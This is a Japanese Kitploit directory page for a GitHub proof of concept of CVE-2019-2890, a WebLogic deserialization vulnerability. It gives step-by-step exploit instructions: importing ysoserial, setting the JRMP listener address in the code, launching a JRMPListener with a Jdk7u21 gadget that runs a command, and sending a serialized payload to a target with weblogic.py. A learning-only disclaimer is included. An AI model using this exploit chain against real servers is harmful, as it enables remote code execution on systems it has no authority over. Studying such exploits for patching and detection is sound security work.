Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-2890 — 0-sec.org | Kitploit
ツール/GitHubGitHub/ianxtianxt/cve-2019-2890
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

0-sec.org

リポジトリを見る
426年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

声明

学習・交流目的のみに使用し、その他の用途による結果は自己責任とします。

説明

関連するjarファイルはすべてプロジェクトにインポート済みであり、利用方法はysoのJRMPを採用しています。学習・デバッグの際に利用方法を変更することができます。

まず、weblogic ディレクトリにある SerializedSystemIni.dat ファイルを security フォルダに配置する必要があります。

次に、yso を ysoserial.jar にリネームし、lib ディレクトリにインポートする必要があります。

1

次に、weblogic/wsee/jaxws/persistence/PersistentContext.java 内の getObject のIPアドレスとポートを指定します。

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

最後に、リモートでJRMPリスナーを起動し、7u21コマンドを利用して実行します。

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

使用方法: Poc.java を実行して poc.ser シリアライズファイルを生成し、以下のコマンドで送信します。

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

ツールをダウンロード